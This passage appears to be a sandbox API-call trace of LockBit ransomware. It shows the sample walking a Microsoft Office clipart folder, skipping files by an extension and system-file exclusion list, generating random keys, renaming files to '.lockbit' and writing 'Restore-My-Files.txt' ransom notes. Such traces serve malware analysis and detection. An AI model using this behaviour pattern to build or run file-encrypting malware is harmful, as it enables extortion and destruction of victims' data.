[0141.453] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.453] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.454] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.454] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.lockbit") returned 72 [0141.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.456] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.456] malloc (_Size=0x40068) returned 0x3df0008 [0141.456] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5272) returned 1 [0141.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.457] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.462] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.462] malloc (_Size=0xa6) returned 0x77d7a8 [0141.463] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.463] free (_Block=0x77d7a8) [0141.463] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.463] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.463] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.463] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107266.WMF", cAlternateFileName="")) returned 1 [0141.463] lstrcmpiW (lpString1=".", lpString2="J0107266.WMF") returned -1 [0141.463] lstrcmpiW (lpString1="..", lpString2="J0107266.WMF") returned -1 [0141.463] PathFindExtensionW (pszPath="J0107266.WMF") returned=".WMF" [0141.463] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.463] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.464] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.464] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107266.WMF") returned 1 [0141.465] lstrcmpiW (lpString1="ntldr", lpString2="J0107266.WMF") returned 1 [0141.465] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107266.WMF") returned 1 [0141.465] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107266.WMF") returned -1 [0141.465] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107266.WMF") returned -1 [0141.465] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107266.WMF") returned 1 [0141.465] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107266.WMF") returned -1 [0141.465] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.465] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF") returned=".WMF" [0141.465] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.465] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.465] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.466] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.466] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.lockbit") returned 72 [0141.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0141.494] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.494] malloc (_Size=0x40068) returned 0x3df0008 [0141.494] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5868) returned 1 [0141.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.495] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.495] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.497] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.497] malloc (_Size=0xa6) returned 0x77d7a8 [0141.497] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.499] free (_Block=0x77d7a8) [0141.499] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.499] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.499] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.499] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107280.WMF", cAlternateFileName="")) returned 1 [0141.499] lstrcmpiW (lpString1=".", lpString2="J0107280.WMF") returned -1 [0141.499] lstrcmpiW (lpString1="..", lpString2="J0107280.WMF") returned -1 [0141.499] PathFindExtensionW (pszPath="J0107280.WMF") returned=".WMF" [0141.499] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.499] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.500] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.500] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107280.WMF") returned 1 [0141.501] lstrcmpiW (lpString1="ntldr", lpString2="J0107280.WMF") returned 1 [0141.501] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107280.WMF") returned 1 [0141.501] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107280.WMF") returned -1 [0141.501] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107280.WMF") returned -1 [0141.501] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107280.WMF") returned 1 [0141.501] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107280.WMF") returned -1 [0141.501] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.501] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF") returned=".WMF" [0141.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.502] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.502] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.503] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.503] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.503] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.lockbit") returned 72 [0141.503] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0141.504] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.504] malloc (_Size=0x40068) returned 0x1ff1e60 [0141.504] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11108) returned 1 [0141.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.504] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.504] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0141.504] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.505] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.505] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0141.505] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.509] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.509] malloc (_Size=0xa6) returned 0x77d7a8 [0141.509] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.510] free (_Block=0x77d7a8) [0141.510] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.510] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.511] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107282.WMF", cAlternateFileName="")) returned 1 [0141.511] lstrcmpiW (lpString1=".", lpString2="J0107282.WMF") returned -1 [0141.511] lstrcmpiW (lpString1="..", lpString2="J0107282.WMF") returned -1 [0141.511] PathFindExtensionW (pszPath="J0107282.WMF") returned=".WMF" [0141.511] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.511] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".mod", 